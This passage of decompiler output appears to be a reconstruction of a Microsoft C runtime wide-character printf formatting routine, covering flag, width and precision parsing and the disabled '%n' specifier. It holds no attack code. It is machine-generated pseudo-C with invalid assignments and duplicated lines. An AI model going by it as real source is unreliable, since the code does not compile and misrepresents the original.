    																__edx =  *(__ebp - 0x454) & 0x0000ffff;
    																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																	__ecx =  *(__ebp - 0x30);
    																	__ecx =  *(__ebp - 0x30) * 0xa;
    																	__eflags = __ecx;
    																	_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																	__eax = __ecx + _t92;
    																	 *(__ebp - 0x30) = __ecx + _t92;
    																} else {
    																	__eax = __ebp + 0x14;
    																	 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																	__eflags =  *(__ebp - 0x30);
    																	if( *(__ebp - 0x30) < 0) {
    																		 *(__ebp - 0x30) = 0xffffffff;
    																	}
    																}
    																goto L214;
    															case 6:
    																L41:
    																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																 *(__ebp - 0x4e8) = __ecx;
    																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																__eflags =  *(__ebp - 0x4e8) - 0x2e;
    																if( *(__ebp - 0x4e8) > 0x2e) {
    																	L64:
    																	goto L214;
    																}
    																L42:
    																_t100 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    																__ecx =  *_t100 & 0x000000ff;
    																switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    																	case 0:
    																		L47:
    																		__ecx =  *(__ebp + 0xc);
    																		__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
    																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    																			L50:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
    																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    																				L53:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *__ecx & 0x0000ffff;
    																				__eflags = ( *__ecx & 0x0000ffff) - 0x64;
    																				if(( *__ecx & 0x0000ffff) == 0x64) {
    																					L59:
    																					L61:
    																					goto L64;
    																				}
    																				L54:
    																				__eax =  *(__ebp + 0xc);
    																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																				__eflags = __ecx - 0x69;
    																				if(__ecx == 0x69) {
    																					goto L59;
    																				}
    																				L55:
    																				__edx =  *(__ebp + 0xc);
    																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
    																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																					goto L59;
    																				}
    																				L56:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *__ecx & 0x0000ffff;
    																				__eflags = ( *__ecx & 0x0000ffff) - 0x75;
    																				if(( *__ecx & 0x0000ffff) == 0x75) {
    																					goto L59;
    																				}
    																				L57:
    																				__eax =  *(__ebp + 0xc);
    																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																				__eflags = __ecx - 0x78;
    																				if(__ecx == 0x78) {
    																					goto L59;
    																				}
    																				L58:
    																				__edx =  *(__ebp + 0xc);
    																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
    																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																					 *(__ebp - 0x45c) = 0;
    																					goto L18;
    																				}
    																				goto L59;
    																			}
    																			L51:
    																			__eax =  *(__ebp + 0xc);
    																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																			__eflags = __ecx - 0x32;
    																			if(__ecx != 0x32) {
    																				goto L53;
    																			} else {
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																				goto L61;
    																			}
    																		}
    																		L48:
    																		__eax =  *(__ebp + 0xc);
    																		__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																		__eflags = __ecx - 0x34;
    																		if(__ecx != 0x34) {
    																			goto L50;
    																		} else {
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																			goto L61;
    																		}
    																	case 1:
    																		L62:
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) | 0x00000020;
    																		 *(__ebp - 0x10) = __ecx;
    																		goto L64;
    																	case 2:
    																		L43:
    																		__edx =  *(__ebp + 0xc);
    																		__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
    																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    																			__eax =  *(__ebp - 0x10);
    																			__eax =  *(__ebp - 0x10) | 0x00000010;
    																			__eflags = __eax;
    																			 *(__ebp - 0x10) = __eax;
    																		} else {
    																			__ecx =  *(__ebp + 0xc);
    																			__ecx =  *(__ebp + 0xc) + 2;
    																			 *(__ebp + 0xc) = __ecx;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																		}
    																		goto L64;
    																	case 3:
    																		L63:
    																		__edx =  *(__ebp - 0x10);
    																		__edx =  *(__ebp - 0x10) | 0x00000800;
    																		__eflags = __edx;
    																		 *(__ebp - 0x10) = __edx;
    																		goto L64;
    																	case 4:
    																		goto L64;
    																}
    															case 7:
    																L65:
    																__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    																__ecx =  *(__ebp - 0x4ec);
    																__ecx =  *(__ebp - 0x4ec) - 0x41;
    																 *(__ebp - 0x4ec) = __ecx;
    																__eflags =  *(__ebp - 0x4ec) - 0x37;
    																if( *(__ebp - 0x4ec) > 0x37) {
    																	while(1) {
    																		L187:
    																		__eflags =  *(__ebp - 0x28);
    																		if( *(__ebp - 0x28) != 0) {
    																			goto L212;
    																		}
    																		goto L188;
    																	}
    																}
    																L66:
    																_t141 =  *(__ebp - 0x4ec) + 0xb97110; // 0xcccccc0d
    																__eax =  *_t141 & 0x000000ff;
    																switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00B970D4))) {
    																	case 0:
    																		L120:
    																		 *(__ebp - 0x2c) = 1;
    																		 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																		__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																		 *(__ebp - 0x454) = __ax;
    																		goto L121;
    																	case 1:
    																		L67:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																		__eflags =  *(__ebp - 0x10) & 0x00000830;
    																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																			__edx =  *(__ebp - 0x10);
    																			__edx =  *(__ebp - 0x10) | 0x00000020;
    																			__eflags = __edx;
    																			 *(__ebp - 0x10) = __edx;
    																		}
    																		goto L69;
    																	case 2:
    																		L82:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																		__eflags =  *(__ebp - 0x10) & 0x00000830;
    																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00000020;
    																			__eflags = __ecx;
    																			 *(__ebp - 0x10) = __ecx;
    																		}
    																		goto L84;
    																	case 3:
    																		L144:
    																		 *(__ebp - 0x460) = 7;
    																		L145:
    																		 *(__ebp - 8) = 0x10;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																		__eflags =  *(__ebp - 0x10) & 0x00000080;
    																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																			__edx = 0x30;
    																			 *(__ebp - 0x14) = __dx;
    																			 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    																			__eflags =  *(__ebp - 0x460) + 0x51;
    																			 *(__ebp - 0x12) = __ax;
    																			 *(__ebp - 0x1c) = 2;
    																		}
    																		goto L150;
    																	case 4:
    																		L75:
    																		__eax = __ebp + 0x14;
    																		 *(__ebp - 0x474) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x474);
    																		if( *(__ebp - 0x474) == 0) {
    																			L77:
    																			__edx =  *0xd121a0; // 0xb775a0
    																			 *(__ebp - 4) = __edx;
    																			__eax =  *(__ebp - 4);
    																			 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																			L81:
    																			goto L187;
    																		}
    																		L76:
    																		__ecx =  *(__ebp - 0x474);
    																		__eflags =  *(__ecx + 4);
    																		if( *(__ecx + 4) != 0) {
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																			__eflags =  *(__ebp - 0x10) & 0x00000800;
    																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																				 *(__ebp - 0xc) = 0;
    																				__edx =  *(__ebp - 0x474);
    																				__eax =  *(__edx + 4);
    																				 *(__ebp - 4) =  *(__edx + 4);
    																				__ecx =  *(__ebp - 0x474);
    																				__edx =  *__ecx;
    																				 *(__ebp - 0x24) =  *__ecx;
    																			} else {
    																				__edx =  *(__ebp - 0x474);
    																				__eax =  *(__edx + 4);
    																				 *(__ebp - 4) =  *(__edx + 4);
    																				__ecx =  *(__ebp - 0x474);
    																				__eax =  *__ecx;
    																				asm("cdq");
    																				 *__ecx - __edx =  *__ecx - __edx >> 1;
    																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																				 *(__ebp - 0xc) = 1;
    																			}
    																			goto L81;
    																		}
    																		goto L77;
    																	case 5:
    																		L121:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		__edx = __ebp - 0x448;
    																		 *(__ebp - 4) = __ebp - 0x448;
    																		 *(__ebp - 0x44) = 0x200;
    																		__eflags =  *(__ebp - 0x30);
    																		if( *(__ebp - 0x30) >= 0) {
    																			L123:
    																			__eflags =  *(__ebp - 0x30);
    																			if( *(__ebp - 0x30) != 0) {
    																				L126:
    																				__eflags =  *(__ebp - 0x30) - 0x200;
    																				if( *(__ebp - 0x30) > 0x200) {
    																					 *(__ebp - 0x30) = 0x200;
    																				}
    																				L128:
    																				__eflags =  *(__ebp - 0x30) - 0xa3;
    																				if( *(__ebp - 0x30) > 0xa3) {
    																					__ecx =  *(__ebp - 0x30);
    																					__ecx =  *(__ebp - 0x30) + 0x15d;
    																					 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																					__eflags =  *(__ebp - 0x20);
    																					if( *(__ebp - 0x20) == 0) {
    																						 *(__ebp - 0x30) = 0xa3;
    																					} else {
    																						__edx =  *(__ebp - 0x20);
    																						 *(__ebp - 4) =  *(__ebp - 0x20);
    																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																					}
    																				}
    																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																				__edx =  *(__ebp + 0x14);
    																				__eax =  *(__edx - 8);
    																				__ecx =  *(__edx - 4);
    																				 *(__ebp - 0x490) =  *(__edx - 8);
    																				 *(__ebp - 0x48c) =  *(__edx - 4);
    																				__ecx = __ebp - 0x40;
    																				_push(E00B7C680(__ebp - 0x40));
    																				__edx =  *(__ebp - 0x2c);
    																				_push( *(__ebp - 0x2c));
    																				__eax =  *(__ebp - 0x30);
    																				_push( *(__ebp - 0x30));
    																				__ecx =  *(__ebp - 0x454);
    																				_push( *(__ebp - 0x454));
    																				__edx =  *(__ebp - 0x44);
    																				_push( *(__ebp - 0x44));
    																				__eax =  *(__ebp - 4);
    																				_push( *(__ebp - 4));
    																				__ecx = __ebp - 0x490;
    																				_push(__ebp - 0x490);
    																				__edx =  *0xd12188; // 0xddc09d6c
    																				E00B849C0(__edx) =  *__eax();
    																				__esp = __esp + 0x1c;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																				__eflags =  *(__ebp - 0x10) & 0x00000080;
    																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																					__eflags =  *(__ebp - 0x30);
    																					if( *(__ebp - 0x30) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__ecx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__edx =  *0xd12194; // 0xddc09d6c
    																						E00B849C0(__edx) =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																				}
    																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    																				if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					__eflags =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__edx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__eax =  *0xd12190; // 0xddc09d6c
    																						__eax =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																				}
    																				__ecx =  *(__ebp - 4);
    																				__edx =  *( *(__ebp - 4));
    																				__eflags =  *( *(__ebp - 4)) - 0x2d;
    																				if( *( *(__ebp - 4)) == 0x2d) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																					__ecx =  *(__ebp - 4);
    																					__ecx =  *(__ebp - 4) + 1;
    																					__eflags = __ecx;
    																					 *(__ebp - 4) = __ecx;
    																				}
    																				__edx =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				do {
    																					L187:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L212;
    																					}
    																					goto L188;
    																				} while ( *(__ebp - 0x4ec) > 0x37);
    																				goto L66;
    																			}
    																			L124:
    																			__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    																			if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    																				goto L126;
    																			}
    																			L125:
    																			 *(__ebp - 0x30) = 1;
    																			goto L128;
    																		}
    																		L122:
    																		 *(__ebp - 0x30) = 6;
    																		goto L128;
    																	case 6:
    																		L69:
    																		 *(__ebp - 0xc) = 1;
    																		__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																		 *(__ebp - 0x458) = __ax;
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) & 0x00000020;
    																		__eflags = __ecx;
    																		if(__ecx == 0) {
    																			__cx =  *(__ebp - 0x458);
    																			 *(__ebp - 0x448) = __cx;
    																		} else {
    																			 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    																			 *(__ebp - 0x470) = __dl;
    																			 *((char*)(__ebp - 0x46f)) = 0;
    																			__ecx = __ebp - 0x40;
    																			__eax = E00B7C680(__ebp - 0x40);
    																			__ecx = __ebp - 0x40;
    																			E00B7C680(__ebp - 0x40) =  *__eax;
    																			__ecx =  *(__ebp - 0x448 + 0xac);
    																			__edx = __ebp - 0x470;
    																			__eax = __ebp - 0x448;
    																			__eax = E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
    																			__eflags = __eax;
    																			if(__eax < 0) {
    																				 *(__ebp - 0x28) = 1;
    																			}
    																		}
    																		__edx = __ebp - 0x448;
    																		 *(__ebp - 4) = __ebp - 0x448;
    																		 *(__ebp - 0x24) = 1;
    																		while(1) {
    																			L187:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L212;
    																			}
    																			goto L188;
    																		}
    																	case 7:
    																		L141:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 8) = 0xa;
    																		L150:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																		__eflags =  *(__ebp - 0x10) & 0x00008000;
    																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																			__eflags =  *(__ebp - 0x10) & 0x00001000;
    																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																				__eflags =  *(__ebp - 0x10) & 0x00000020;
    																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																					__eflags =  *(__ebp - 0x10) & 0x00000040;
    																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																						__ecx = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						__edx = 0;
    																						__eflags = 0;
    																						 *(__ebp - 0x4a0) = __eax;
    																						 *(__ebp - 0x49c) = 0;
    																					} else {
    																						__eax = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						asm("cdq");
    																						 *(__ebp - 0x4a0) = __eax;
    																						 *(__ebp - 0x49c) = __edx;
    																					}
    																				} else {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																					__eflags =  *(__ebp - 0x10) & 0x00000040;
    																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																						__ecx = __ebp + 0x14;
    																						E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																						asm("cdq");
    																						 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																						 *(__ebp - 0x49c) = __edx;
    																					} else {
    																						__eax = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						__ax = __eax;
    																						asm("cdq");
    																						 *(__ebp - 0x4a0) = __eax;
    																						 *(__ebp - 0x49c) = __edx;
    																					}
    																				}
    																			} else {
    																				__eax = __ebp + 0x14;
    																				 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x49c) = __edx;
    																			}
    																		} else {
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																			 *(__ebp - 0x49c) = __edx;
    																		}
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																		__eflags =  *(__ebp - 0x10) & 0x00000040;
    																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																			goto L167;
    																		}
    																	case 8:
    																		L106:
    																		__eax = __ebp + 0x14;
    																		 *(__ebp - 0x484) = E00B93D50(__ebp + 0x14);
    																		__eax = E00B97280();
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			L116:
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) & 0x00000020;
    																			__eflags = __ecx;
    																			if(__ecx == 0) {
    																				__ecx =  *(__ebp - 0x484);
    																				__edx =  *(__ebp - 0x44c);
    																				 *__ecx =  *(__ebp - 0x44c);
    																			} else {
    																				__edx =  *(__ebp - 0x484);
    																				__ax =  *(__ebp - 0x44c);
    																				 *( *(__ebp - 0x484)) = __ax;
    																			}
    																			 *(__ebp - 0x28) = 1;
    																			while(1) {
    																				L187:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L212;
    																				}
    																				goto L188;
    																			}
    																		}
    																		L107:
    																		__ecx = 0;
    																		__eflags = 0;
    																		if(0 == 0) {
    																			 *(__ebp - 0x4f4) = 0;
    																		} else {
    																			 *(__ebp - 0x4f4) = 1;
    																		}
    																		__edx =  *(__ebp - 0x4f4);
    																		 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    																		__eflags =  *(__ebp - 0x488);
    																		if( *(__ebp - 0x488) == 0) {
    																			_push(L"(\"\'n\' format specifier disabled\", 0)");
    																			_push(0);
    																			_push(0x695);
    																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																			_push(2);
    																			__eax = L00B7D760();
    																			__esp = __esp + 0x14;
    																			__eflags = __eax - 1;
    																			if(__eax == 1) {
    																				asm("int3");
    																			}
    																		}
    																		__eflags =  *(__ebp - 0x488);
    																		if( *(__ebp - 0x488) != 0) {
    																			L115:
    																			while(1) {
    																				L187:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L212;
    																				}
    																				goto L188;
    																			}
    																		} else {
    																			L114:
    																			 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																			__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																			 *(__ebp - 0x4cc) = 0xffffffff;
    																			__ecx = __ebp - 0x40;
    																			__eax = E00B7C650(__ecx);
    																			__eax =  *(__ebp - 0x4cc);
    																			goto L225;
    																		}
    																	case 9:
    																		L148:
    																		 *(__ebp - 8) = 8;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																		__eflags =  *(__ebp - 0x10) & 0x00000080;
    																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																			__edx =  *(__ebp - 0x10);
    																			__edx =  *(__ebp - 0x10) | 0x00000200;
    																			__eflags = __edx;
    																			 *(__ebp - 0x10) = __edx;
    																		}
    																		while(1) {
    																			L150:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x49c) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x49c) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x49c) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L167;
    																			}
    																			goto L163;
    																		}
    																	case 0xa:
    																		L143:
    																		 *(__ebp - 0x30) = 8;
    																		goto L144;
    																	case 0xb:
    																		L84:
    																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
    																		if( *(__ebp - 0x30) != 0xffffffff) {
    																			__edx =  *(__ebp - 0x30);
    																			 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    																		} else {
    																			 *(__ebp - 0x4f0) = 0x7fffffff;
    																		}
    																		__eax =  *(__ebp - 0x4f0);
    																		 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    																		__ecx = __ebp + 0x14;
    																		 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																		__eflags =  *(__ebp - 0x10) & 0x00000020;
    																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																			L98:
    																			__eflags =  *(__ebp - 4);
    																			if( *(__ebp - 4) == 0) {
    																				__ecx =  *0xd121a4; // 0xb77590
    																				 *(__ebp - 4) = __ecx;
    																			}
    																			 *(__ebp - 0xc) = 1;
    																			__edx =  *(__ebp - 4);
    																			 *(__ebp - 0x480) =  *(__ebp - 4);
    																			while(1) {
    																				L101:
    																				__eax =  *(__ebp - 0x47c);
    																				__ecx =  *(__ebp - 0x47c);
    																				__ecx =  *(__ebp - 0x47c) - 1;
    																				 *(__ebp - 0x47c) = __ecx;
    																				__eflags =  *(__ebp - 0x47c);
    																				if( *(__ebp - 0x47c) == 0) {
    																					break;
    																				}
    																				L102:
    																				__edx =  *(__ebp - 0x480);
    																				__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																				__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																				if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																					break;
    																				}
    																				L103:
    																				 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																				 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																			}
    																			L104:
    																			__edx =  *(__ebp - 0x480);
    																			__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
    																			__eflags = __edx;
    																			 *(__ebp - 0x24) = __edx;
    																			goto L105;
    																		} else {
    																			L88:
    																			__eflags =  *(__ebp - 4);
    																			if( *(__ebp - 4) == 0) {
    																				__eax =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __eax;
    																			}
    																			__ecx =  *(__ebp - 4);
    																			 *(__ebp - 0x478) = __ecx;
    																			 *(__ebp - 0x24) = 0;
    																			while(1) {
    																				L92:
    																				__eax =  *(__ebp - 0x24);
    																				__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
    																				if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																					break;
    																				}
    																				L93:
    																				__ecx =  *(__ebp - 0x478);
    																				__edx =  *__ecx;
    																				__eflags =  *__ecx;
    																				if( *__ecx == 0) {
    																					break;
    																				}
    																				L94:
    																				__ecx = __ebp - 0x40;
    																				E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    																				__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    																				__eax = E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
    																				__eflags = __eax;
    																				if(__eax != 0) {
    																					__edx =  *(__ebp - 0x478);
    																					__edx =  *(__ebp - 0x478) + 1;
    																					__eflags = __edx;
    																					 *(__ebp - 0x478) = __edx;
    																				}
    																				 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																				 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																				__edx =  *(__ebp - 0x24);
    																				__edx =  *(__ebp - 0x24) + 1;
    																				__eflags = __edx;
    																				 *(__ebp - 0x24) = __edx;
    																			}
    																			L97:
    																			L105:
    																			while(1) {
    																				L187:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L212;
    																				}
    																				goto L188;
    																			}
    																		}
    																	case 0xc:
    																		L142:
    																		 *(__ebp - 8) = 0xa;
    																		while(1) {
    																			L150:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
